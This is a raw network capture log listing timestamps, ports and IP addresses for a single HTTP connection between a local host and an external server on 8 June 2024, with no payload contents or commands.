Jun 8, 2024 20:22:06.098984957 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.098989964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099013090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099030972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099030972 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099034071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099066019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099066019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099630117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099652052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099673033 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099678993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099694967 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099699020 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099715948 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099716902 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099735975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099739075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099757910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099757910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099777937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099792004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099796057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099813938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099833965 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099838018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099855900 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099858046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099881887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099883080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099905014 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099906921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.099946022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.099946022 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100480080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100517988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100533962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100564003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100636959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100658894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100677013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100687027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100697994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100714922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100714922 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100722075 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100737095 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100744009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100764990 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100765944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100784063 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100785971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100804090 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100807905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100830078 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100851059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100851059 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100852966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.100871086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.100899935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101596117 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101619005 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101640940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101645947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101661921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101666927 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101682901 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101687908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101705074 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101707935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101727962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101744890 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101758957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101780891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101805925 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101815939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101823092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101840019 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101861000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101865053 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101882935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101882935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101900101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101905107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101922989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101927996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101948977 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101965904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101965904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101969957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.101986885 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.101991892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102006912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102015018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102036953 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102054119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102054119 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102077961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102843046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102865934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102885962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102895021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102909088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102916956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102931023 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102936029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102952957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102956057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102972984 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102974892 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.102994919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.102998972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103018045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103022099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103041887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103044987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103060961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103068113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103089094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103097916 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103106976 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103121042 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103127956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103147030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103147030 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103166103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103734016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103755951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103776932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103785038 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103800058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103805065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103821993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103823900 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103841066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103844881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103866100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103890896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103902102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103924036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103945017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103954077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103954077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103966951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.103985071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.103988886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104007006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104011059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104027033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104031086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104053020 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104060888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104075909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104088068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104088068 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104137897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104692936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104715109 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104736090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104743958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104764938 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104764938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104782104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104787111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104808092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104809046 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104831934 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104832888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104850054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104855061 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104872942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104876995 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104896069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104899883 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104918003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104922056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104943037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104944944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.104969025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.104984999 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105686903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105709076 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105730057 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105736971 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105751991 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105765104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105765104 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105775118 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105796099 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105797052 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105815887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105834961 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105844975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105844975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105856895 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105870962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105870962 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105878115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105900049 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105902910 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105921030 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105922937 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105942011 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105942011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105963945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105969906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.105984926 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.105987072 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106005907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106007099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106028080 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106045961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106045961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106075048 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106699944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106722116 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106741905 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106749058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106762886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106770039 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106786013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106791019 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106806993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106808901 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106827974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106828928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106849909 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106869936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106873989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106890917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106890917 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106910944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106913090 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106933117 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106935024 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106957912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106957912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106975079 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.106981039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.106997967 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107026100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107614994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107635975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107656956 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107666016 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107678890 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107686996 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107701063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107706070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107723951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107724905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107742071 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107745886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107768059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107773066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107786894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107793093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107808113 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107810974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107831001 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107831955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107851982 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107856035 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107873917 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107894897 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107901096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107901096 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107914925 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.107919931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107943058 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.107959032 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108438015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108460903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108494043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108505011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108505011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108516932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108536005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108539104 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108557940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108572960 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108582973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108597040 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108618975 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108639002 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108642101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108642101 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108660936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108664989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108685017 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108716965 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108920097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108942986 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108963966 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.108974934 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108975887 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.108988047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.109011889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.109035015 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.109054089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.109118938 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.109148026 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.181651115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.186754942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430407047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430460930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430497885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430604935 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430640936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430749893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430749893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430749893 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430769920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430821896 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430856943 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430891037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430926085 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430959940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.430967093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430967093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430967093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430967093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.430967093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431003094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431013107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431065083 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431291103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431324959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431350946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431360006 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431370974 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:06.431394100 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:06.431412935 CEST	49731	80	192.168.2.4	23.88.106.134
